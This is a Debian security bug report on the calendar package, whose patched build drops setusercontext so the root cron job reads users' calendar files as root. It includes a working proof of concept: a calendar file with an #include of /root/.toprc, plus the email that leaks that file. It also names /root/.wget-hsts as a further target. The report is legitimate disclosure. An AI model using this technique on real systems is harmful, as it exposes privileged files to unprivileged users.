Package: calendar
Version: 12.1.7+nmu3
Severity: serious
Tags: security
Justification: security
X-Debbugs-Cc: t...@mirbsd.de, Debian Security Team <t...@security.debian.org>
I was wondering how Debian’s calendar(1) packaging handled the
setusercontext(3) part, and after finding d/p/calendar_cap.diff
I see it just… does away with it õÕ
This allows wonderful information disclosure:
tglase@tglase-nb:~ $ cat .calendar/calendar
Nov 01 Allerheiligen
#define Def Nov 01
#define Job Nov 01
#define Mem Nov 01
#define Usr Nov 01
#include "/root/.toprc"
tglase@tglase-nb:~ $ cat /root/.toprc
cat: /root/.toprc: Permission denied
↓ ↓ ↓
From: Reminder Service <tgl...@tglase-nb.lan.tarent.de>
Message-ID: <20211031232839.c72361c3...@tglase-nb.lan.tarent.de>
To: tgl...@tglase-nb.lan.tarent.de
Date: Mon, 1 Nov 2021 00:28:39 +0100 (CET)
Subject: Monday's Calendar
Nov 01 Allerheiligen
Nov 01 fieldscur=AEhIOQTrspvuWbcdfgjyzlKNMX
winflags=65208, sortindx=10, maxtasks=0
summclr=6, msgsclr=6, headclr=7, taskclr=7
Nov 01 fieldscur=ABcefgjlrstuvyzMKNHIWOPQDX
winflags=62776, sortindx=0, maxtasks=0
summclr=6, msgsclr=6, headclr=7, taskclr=6
Nov 01 fieldscur=ANOPQRSTUVbcdefgjlmyzWHIKX
winflags=62776, sortindx=13, maxtasks=0
summclr=5, msgsclr=5, headclr=4, taskclr=5
Nov 01 fieldscur=ABDECGfhijlopqrstuvyzMKNWX
winflags=62776, sortindx=4, maxtasks=0
summclr=3, msgsclr=3, headclr=2, taskclr=3
This is *mildly* mitigated by the fact that you can only extract
contents of files that start with a cpp-able string *and* contain
a tab somewhere after that (because calendar(1) does not call cpp(1)
with -traditional-cpp, which is another minor bug in the port), but
I believe people can and will find creative ways to extract more.
/root/.wget-hsts can be used to see whether a given host was already
contacted, for example.
-- System Information:
Debian Release: 11.1
APT prefers stable-updates
APT policy: (500, 'stable-updates'), (500, 'stable-security'), (500,
'stable-debug'), (500, 'oldstable-updates'), (500, 'oldoldstable'), (500,
'stable'), (500, 'oldstable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386
Kernel: Linux 5.10.0-8-amd64 (SMP w/2 CPU threads)
Kernel taint flags: TAINT_WARN
Locale: LANG=C.UTF-8, LC_CTYPE=C.UTF-8 (charmap=UTF-8), LANGUAGE not set
Shell: /bin/sh linked to /bin/lksh
Init: sysvinit (via /sbin/init)
Versions of packages calendar depends on:
ii cpp 4:10.2.1-1
ii libbsd0 0.11.3-1
ii libc6 2.31-13+deb11u2
calendar recommends no packages.
calendar suggests no packages.
-- Configuration Files:
/etc/cron.daily/calendar changed:
. /etc/default/calendar
[ x$RUN_DAILY = xtrue ] || exit 0
[ -x /usr/sbin/sendmail ] || exit 0
if [ ! -x /usr/bin/cpp ]; then
echo "The cpp package is needed to run calendar."
exit 1
fi
/usr/bin/calendar -a
/etc/default/calendar changed:
RUN_DAILY=true
-- no debconf information
